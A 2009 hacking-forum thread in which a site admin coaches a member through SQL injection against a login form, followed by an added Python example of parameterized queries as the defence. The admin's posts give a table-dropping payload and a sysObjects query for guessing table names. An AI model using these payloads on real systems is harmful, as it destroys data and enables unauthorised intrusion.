ThisisLegal.com

ThisisLegal Forums


#1 2009-09-26 18:12:02

Timse
Member
Registered: 2009-02-08
Posts: 18

SQL Drop table

I am wanting to drop a table, but I am not so good at SQL injection.
Is UserID and Pwd the tables?
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'UserID = ''X' '1'='2' And Pwd = ''X' '1'='2''.


#2 2009-09-27 03:26:10

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: SQL Drop table

No, it appears UserID and Pwd are the user and password columns for the table. First you need to find out the table name, then try:

x"; drop table [TABLE NAME HERE] /*

in the username box and leave the password box blank.


Site admin


#3 2009-09-27 03:52:36

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: SQL Drop table

How can I find the table name???


#4 2009-09-27 07:09:20

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: SQL Drop table

There is no definite answer to this. It is mostly down to guessing obvious names (members, users, login, etc.).

I know nothing about M$ ODBC, but from research it appears to use M$SQL, so you could get the table name from some trial and error with SysObjects that is built in.

This is starting to get pretty advanced, though: you need to do a union select and find out the number of columns in the table. Look at tutorials #3 and #18 on this site for more, but here is the injection (without the first part, union or null columns); you will need to figure some out yourself.

(Look for a (U)ser table starting with 'user')

SELECT name FROM sysObjects WHERE type = 'U' AND name LIKE 'user%'

Site admin
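
As a defensive counterpart to the error message in the first post, this added example (not code from the thread or the site) shows how pasting input into the SQL text produces that kind of column-leaking error, and how bound parameters with a generic failure message avoid it. It uses Python's sqlite3 as a stand-in for the Access/ODBC back end; the `accounts` table, its row and the function names are assumptions.

```python
import logging
import sqlite3

log = logging.getLogger("login")

def make_db():
    # Constructed stand-in database; table name and row are hypothetical.
    # Plaintext Pwd mirrors the query on the page; real systems store a hash.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (UserID TEXT, Pwd TEXT)")
    db.execute("INSERT INTO accounts VALUES ('alice', 'correct horse')")
    return db

def login_concatenated(db, user, pwd):
    """Pattern implied by the error in post #1: input pasted into the SQL text."""
    sql = ("SELECT COUNT(*) FROM accounts WHERE UserID = '" + user +
           "' And Pwd = '" + pwd + "'")
    try:
        return db.execute(sql).fetchone()[0] > 0, None
    except sqlite3.Error as exc:
        # Echoing driver text and the query is what disclosed UserID and Pwd.
        return False, f"{exc} in query expression {sql!r}"

def login_parameterized(db, user, pwd):
    """Bound parameters: input is only ever data; errors stay in the server log."""
    sql = "SELECT COUNT(*) FROM accounts WHERE UserID = ? AND Pwd = ?"
    try:
        ok = db.execute(sql, (user, pwd)).fetchone()[0] > 0
    except sqlite3.Error:
        log.exception("login query failed")  # detail is logged, not returned
        return False, "Login failed."
    return ok, (None if ok else "Login failed.")

if __name__ == "__main__":
    db = make_db()
    probe = "'X' '1'='2"  # the input visible in the error message in post #1
    print(login_concatenated(db, probe, probe))   # leaks the query structure
    print(login_parameterized(db, probe, probe))  # generic failure, no SQL error
```
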
